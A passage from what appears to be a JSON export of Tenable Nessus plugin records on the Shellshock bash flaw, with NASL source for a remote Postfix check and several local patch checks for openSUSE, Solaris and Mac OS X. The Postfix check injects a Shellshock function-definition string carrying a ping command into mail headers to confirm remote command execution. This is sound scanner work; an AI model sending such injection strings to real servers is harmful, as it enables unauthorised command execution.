thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not postfix\nispf = get_kb_item(\"SMTP/\"+port+\"/postfix\");\nif(isnull(ispf) || !ispf) audit(AUDIT_NOT_DETECT,\"Postfix\",port);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\",\n \"\" # For the actual text of the email\n);\n\n# Build the attack data\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\n# Do the SMTP boogaloo, for postfix FROM/TO have to be valid\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || ptrn >!< s) 
audit(AUDIT_LISTEN_NOT_VULN,\"Postfix\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif(empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif(hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif(header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif(report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:37", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. 
As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-594.NASL", "href": "https://www.tenable.com/plugins/nessus/78590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-594.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78590);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE 
Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP 
Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.19.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:19:41", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126547 patch-revision plugins, or deemed non-security related.", "cvss3": {}, "published": "2012-09-17T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 126547-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_126547.NASL", "href": "https://www.tenable.com/plugins/nessus/62115", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62115);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (x86) : 126547-10 (deprecated)\");\n script_summary(english:\"Check for patch 126547-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. 
Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126547 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126547-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126547 instead.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:11", "description": "The remote host is running a version of Mac OS X 10.8 or 10.9 that does not have Security Update 2014-005 applied. This update contains several security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. 
(CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {}, "published": "2014-10-17T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3566", "CVE-2014-6271", "CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2014-005.NASL", "href": "https://www.tenable.com/plugins/nessus/78551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78551);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137, 70574);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-10-16-2\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity issues.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.8 or 10.9 that\ndoes not have Security Update 2014-005 applied. This update contains\nseveral security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as\n Shellshock. 
The vulnerability is due to the processing\n of trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability known as POODLE. The vulnerability is due\n to the way SSL 3.0 handles padding bytes when decrypting\n messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. A MitM attacker can decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT203107\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/533721/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2014-005 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = '2014-005';\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:'-');\n local_var p_year = int( 
p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[89]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.8 / 10.9\");\nelse if (\"Mac OS X 10.8\" >< os && !ereg(pattern:\"Mac OS X 10\\.8($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mountain Lion later than 10.8.5.\");\nelse if (\"Mac OS X 10.9\" >< os && !ereg(pattern:\"Mac OS X 10\\.9($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mavericks later than 10.9.5.\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:19:57", "description": "Vulnerability in the Solaris component of Oracle Sun Systems 
Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126546 patch-revision plugins, or deemed non-security related.", "cvss3": {}, "published": "2012-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546.NASL", "href": "https://www.tenable.com/plugins/nessus/62305", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. 
Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62305);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-10 (deprecated)\");\n script_summary(english:\"Check for patch 126546-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. 
Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126546 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126546-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 